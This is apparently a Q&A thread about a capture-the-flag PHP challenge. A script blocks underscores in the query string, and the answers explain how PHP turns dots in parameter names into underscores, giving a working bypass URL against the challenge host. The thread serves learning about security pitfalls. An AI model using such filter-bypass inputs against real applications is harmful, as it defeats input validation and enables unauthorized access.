# Where's vulnerability in this php code?

Tags: php, security

I'm solving the problems of codeshell.kr

```
  <?php 
    include("./config.php"); 

    $foo = $_GET['______foo_adm1nkyj______']; 
    $check = urldecode($_SERVER['QUERY_STRING']); 

    if(preg_match("/_| /i", $check)) 
    { 
        die("no hack ~_~"); 
    } 
    if($foo == "adm1nkyj") 
    { 
        echo $flag; 
    } 

    echo "<br/>"; 
    highlight_file(__FILE__); 
  ?>
```

What should I do to get the `$flag`?
 And what is the vulnerability of those codes? Is it in `$_GET`? or `preg_match()`? I can't find it despite searching in google.

Comment: The issue is that the `preg_match()` will check the `_` exists from the URL (line `?______foo_ad1nkyj____=someValue` and run the `die()` method.. have you tried replacing the _ to the alt code for it? This isn't exactly the site for this question, its not a programmable question so I am downvoting.

Answer (score 4, accepted):

The solution is this:

```
http://123.111.158.161/codeshell/prob2/?......foo.adm1nkyj......=adm1nkyj
```

It works because PHP replaces dots and spaces with underscores in the keys of the request data arrays (`$_GET`, `$_POST`, `$_REQUEST`, `$_COOKIE`).

From [PHP docs](http://php.net/manual/en/language.variables.external.php):

> Note: Dots and spaces in variable names are converted to underscores. For example `<input name="a.b" />` becomes `$_REQUEST["a_b"]`.

This is probably a relic from times when register globals was still a thing.

Answer (score 2):

The issue is actually pretty simple when you know about one thing: php replace the dots in GET variables names by underscore.

The script check if there is an underscore in the GET variable and if so, dies. So it cannot reach the point where it checks for the GET variable values. But if you replace underscores by dots, it goes through.

Just call this url:

```
123.111.158.161/codeshell/prob2/?......foo.adm1nkyj......=adm1nkyj
```